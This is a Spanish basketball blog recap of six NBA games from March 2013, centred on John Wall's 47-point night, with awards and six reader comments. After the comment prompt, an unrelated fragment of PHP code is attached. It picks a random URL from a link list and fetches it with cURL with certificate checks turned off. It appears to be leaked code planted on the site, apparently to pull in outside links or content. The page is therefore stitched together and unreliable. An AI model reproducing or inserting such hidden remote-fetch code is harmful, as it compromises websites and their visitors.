La crónica: The Wall

26 de March de 2013 por Simon

The wallSeis partidos se disputaron en la jornada de ayer, en la que los equipos locales supieron imponer su ley con la excepción de Orlando, que le tocó jugar contra “King James” y ahí ya no hay ley que valga, tan sólo lo que dicte y ordene LeBron. El protagonista de la noche fue el hombre de la foto, pero empecemos con la 27ª seguida de Miami.

Prácticamente nadie en el Amway Center pensaba que la racha de los Heat se fuera a romper ayer. Aun con la baja de Wade, Miami demostró estar un mundo por encima de los Magic a pesar del buen papel de éstos en ausencia de Vucevic. Miami rompió el partido en el segundo cuarto, aunque con un gran tercer periodo los Magic consiguieron igualar el marcador a falta de 2 minutos del mismo. Pero en esos 2 minutos un parcial de 10-0 capitaneado por James devolvió el partido a su situación anterior y dio a Miami su vigésimo séptima victoria consecutiva (108-94). James se quedó a un solo rebote de un nuevo triple doble: 24 puntos, 11 asistencias y 9 rebotes para el angelito en una noche en que no forzó en absoluto. Buen partido de los titulares de Orlando, en especial de Jameer Nelson, que terminó el partido con 27 puntos y 12 asistencias.

Denver no pudo seguir los pasos de Miami y vio cortada en New Orleans su racha de 15 victorias seguidas (86-110). Hornets salió muy centrado en el partido y jugando un baloncesto muy serio consiguió desde el inicio las primeras ventajas importantes dirigidos por Brian Roberts, que terminó con 18 asistencias, y con Anderson, Roger Mason y Darius Miller golpeando una y otra vez a Denver desde la larga distancia con 5 triples del ala-pívot y 4 cada uno de los dos exteriores. 7 jugadores tuvo NOLA en dobles figuras de anotación. En Denver echaron de menos a Ty Lawson, que es el que desatasca al equipo en los ataques en estático, pues precisamente ayer no pudieron correr todo lo que les gusta a Denver debido a la superioridad que mostraron en los tableros los hombres de New Orleans.

kobe warriorsYa da pereza hablar de los Lakers y la enésima decepción y humillación que sufren en esta temporada. Y es que el primer tiempo de su partido ante Golden State Warriors fue precisamente eso, una humillación en toda regla. Fueron un juguete en las manos de Warriors, que al descanso estaban +23 aunque debido a la relajación de los de Mark Jackson, Lakers pudieron maquillar el marcador (103-109). Gran partido de la dupla estrella de Golden State: Curry terminó el partido con 25 puntos, 10 asistencias y 7 rebotes mientras que Lee aportó 23 puntos y 12 rebotes. En Lakers 36 puntos y 8 rebotes para Bryant con malos porcentajes, 21-9-7 de Nash y 11 puntos y 15 rebotes para Howard. Ayer Utah sí que aprovechó la derrota de Lakers para acercarse y mantener sus opciones de Play off venciendo en el EnergySolutions Arena a Philadelphia 76ers con facilidad (91-107). Utah contó con siete jugadores de su rotación en dobles figuras de anotación repartiendo mucho sus tiros y su juego. Tras la victoria de ayer Utah está a tan sólo un partido con Lakers. El tercero en discordia, Dallas, se colocaría a un partido si consigue vencer esta noche a los Clippers.

Para terminar, tenemos la visita de Atlanta a Indiana, un partido que no tuvo demasiada historia cuando Indiana se puso con grandes ventajas durante el segundo cuarto, ventaja que Atlanta no fue capaz de contrarrestar y tan sólo consiguió recortarla para maquillar el marcador en el último cuarto cuando Indiana ya había bajado el pistón una vez tenían la victoria en el bolsillo (94-100). Roy Hibbert jugó al nivel que se le presupone por su contrato con 17 puntos y 13 rebotes aunque el máximo anotador fue Gerald Green, que parece que en este final de temporada ha encontrado un poco más de regularidad y está jugando su mejor baloncesto de la temporada.Lo mejor de la jornada de ayer y la actuación que le da título a nuestra crónica la hemos dejado para casi el final de la misma. Memphis visitaba Washington con la baja de Marc Gasol y sabiendo que iba a ser un partido duro, pues Wizards en su casa es un equipo muy complicado. Lo que no esperaban era encontrar semejante animal en John Wall, que destrozó todas las opciones de Memphis con sus 47 puntos, 7 rebotes y 8 asistencias en la noche de ayer para guiar a su equipo a una victoria que se fraguó en el último cuarto tras un partido igualado con ventajas exiguas que sólo se rompió al final. Wall estuvo apoyado por Okafor con 21 puntos. Una lástima sin duda que no hayamos podido ver toda la temporada a estos Wizards al completo, pues seguro que habrían luchado por una plaza de Play Off.

PREMIOS

MVP: Ni siquiera LeBron hace sombra a la bestial actuación protagonizada anoche por John Wall. 47 puntos, 17 de ellos en el último cuarto, con 13/22 en tiros de campo, 19/24 en libres, 7 rebotes, 8 asistencias y un +26 durante los 44 minutos y medio que estuvo en pista. No me extraña que Pink Floyd le dedicasen un disco…

Brian Roberts

El rookie: sin Greivis Vasquez en el quinteto, apareció Brian Roberts para liderar la victoria sobre los Nuggets con 13 puntos y 18 asistencias. Su anterior máximo en pases de canasta era 9, en el único partido hasta la fecha que había jugado como titular.

La sorpresa: la derrota por 24 puntos de los Nuggets ante unos de los últimos del Oeste para acabar con una racha de 15 victorias seguidas, con 18 asistencias de un rookie que no fue drafteado, es más que suficiente para llevarse el galardón a sorpresa del día. Premio para los Hornets.

La decepción: la primera parte de los Lakers en un partido ante un rival directo fue penosa. El 40-63 en el marcador al descanso apenas llega a reflejar las terribles sensaciones que transmitió el equipo angelino durante muchos minutos.

Mayor esfuerzo en vano: los 27 puntos, 12 asistencias, 5 rebotes y 2 robos de Nelson ante los Heat, los 36 puntos y 8 rebotes de Kobe son las principales actuaciones entre los equipos perdedores de la noche.

TOP 10

Comenta

6 comentarios a esta entrada

  1. Melo15 dice:
    #1

    Buff…
    Ya lo dije hace unos días, Wall esta absolutamente imparable, el año que viene serán súper candidatos a Playoffs.

      Citar

  2. Denise dice:
    #2

    Ojo con Lakers que se complican los Playoffs ahora que tienen un calendario más facil y que tienen a sus 4 “magníficos” en pista. Su principal rival a batir ya no creo que sea Utah, que aunque están a un partido, se les ve muertos en la cancha. Su rival son los Mavs del amigo Cuban que vienen como un tiro por detrás.

    Visto como está el patio, ahora mismo todo lo que no sea que los Heat revaliden el anillo, es una sorpresa.

      Citar

  3. Esteban dice:
    #3

    que pereza ver las dos derrotas consecutivas hace un fin de semana de los pacers y la ultima frente a los bulls, en tres juegos que estos debieran haber ganado y hoy tendrian un record de 47-24, a la altura de los mejores de la liga, pero en fin, ayer con medio equipo, vogel volvio a mostrar por que debe ser elegido entrenador del año

    si green se mantiene en esta tonica de anotar y granger, a una vez por todas vuelve y se hace un arma en este equipo, sin dudas seran finalistas y pueden hacerle sudar algo al heat

      Citar

  4. Maicas dice:
    #4

    Mi opinion es que los Heat van a revalidar el titulo mas facil de lo esperado si no reaccionan pronto los demas equipos capaces de hacerles frente. A dia de hoy la superioridad que demuestran es aplastante.
    En cuanto a los Lakers ojala no se metan en playoffs.. Sinceramente no se lo merecen ya que con ese equipazo tendrian que estar en los primeros puestos del Oeste con claras opciones de alcanzar el tan ansiado anillo. Pero la realidad es muy diferente aunque creo que podrian dar algun susto dependiendo del oponente que les tocara si al final se clasifican.

      Citar

  5. Rompe dice:
    #5

    Lo mejor/peor de los Heat es que incluso al nivel de LeBron, da la impresión de que el tío está jugando a medio gas. Me da miedo pensar qué nivel puede alcanzar en los PO, porque podemos estar hablando, sin lugar a dudas, de uno de los 4-5 mejores jugadores de la historia.

      Citar

  6. Esteban dice:
    #6

    el heat deberia sufrir la baja indefinida de wade o bosh, tal como los pacers perdieron a granger, los bulls a rose, los knicks a amare/melo/chandler/varios, entre otros

    asi sinceramente el este es injusto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>